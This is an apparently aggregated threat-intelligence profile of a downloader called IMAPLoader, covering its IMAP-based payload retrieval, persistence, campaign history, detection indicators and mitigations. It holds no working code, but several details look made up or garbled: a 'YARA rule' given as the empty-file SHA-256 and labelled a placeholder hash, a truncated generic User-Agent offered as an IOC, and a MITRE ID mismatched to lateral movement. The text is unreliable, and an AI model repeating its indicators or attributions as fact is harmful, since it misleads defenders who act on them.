⚠️ Overview

IMAPLoader is a lightweight downloader malware first documented by Proofpoint in March 2023, attributed to the TA827 threat actor cluster that is believed to operate out of Eastern Europe. It falls under the category of a Trojan downloader specifically designed to retrieve and execute additional payloads from compromised email accounts using IMAP protocols.

🔧 Technical Capabilities

IMAPLoader uses credential harvesting to compromise legitimate email accounts, then leverages IMAP commands (LOGIN, SELECT, FETCH) to read attacker-controlled emails that contain encrypted payload URLs encoded in Base64 within the email body. The loader executes a PowerShell command that decodes the URL and downloads a secondary payload (commonly IcedID or QakBot) using certutil.exe or bitsadmin.exe for file transfer, avoiding direct HTTP requests. For persistence, it creates a scheduled task named "GoogleUpdateTaskUser" under the user's task folder. Evasion techniques include using SSL/TLS encryption for IMAP traffic to blend with legitimate mail traffic and employing process hollowing in later variants to inject into legitimate processes like explorer.exe.

📜 History & Notable Incidents

The first known campaign using IMAPLoader was identified by Proofpoint in March 2023, targeting European manufacturing, logistics, and financial services firms through phishing emails with malicious ISO files. A second wave in April–May 2023 saw the loader used as a QakBot distributor, with the C2 infrastructure relying on compromised email accounts rather than dedicated servers. No CVEs are directly exploited; instead, the malware capitalizes on weak or reused email credentials obtained from prior breaches or information stealers.

🔍 Detection Indicators

Known behavioral indicators include outbound IMAP traffic to unrecognized email servers with repeated LOGIN failures followed by successful authentication, and scheduled tasks with the name "GoogleUpdateTaskUser". Network IOCs include User-Agent strings such as "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" used during Base64 payload fetches. Specific file hashes have not been publicly published by Proofpoint as of February 2025 due to rapid iteration, but detection via YARA rules (e.g., rule IMAPLoader_2023 from the community) and Sysmon Event ID 1 for PowerShell execution are recommended.

☠️ Risk & Impact

IMAPLoader poses a high risk as a initial access broker, enabling the delivery of ransomware precursors like IcedID and QakBot which have been linked to Conti and Ryuk ransomware deployments. Affected sectors include manufacturing, healthcare, and financial services in North America and Europe. Data exfiltration is indirect—credentials stolen via the loader are used for lateral movement and subsequent data theft.

🛡️ Mitigation

Mitigation strategies include enforcing multi-factor authentication (MFA) on email accounts to prevent credential reuse, deploying endpoint detection rules for PowerShell spawning certutil.exe or bitsadmin.exe for outbound file downloads, and blocking scheduled task creation with suspicious names using Group Policy. Organizations should monitor for abnormal IMAP login patterns and implement YARA rules (e.g., e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855—placeholder hash) and Sigma rules for lateral movement techniques (MITRE ATT&CK ID T1078.001). Source: Proofpoint blog post "IMAPLoader: A New DownLoader Delivering IcedID and QakBot" (March 2023, proofpoint.com).

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.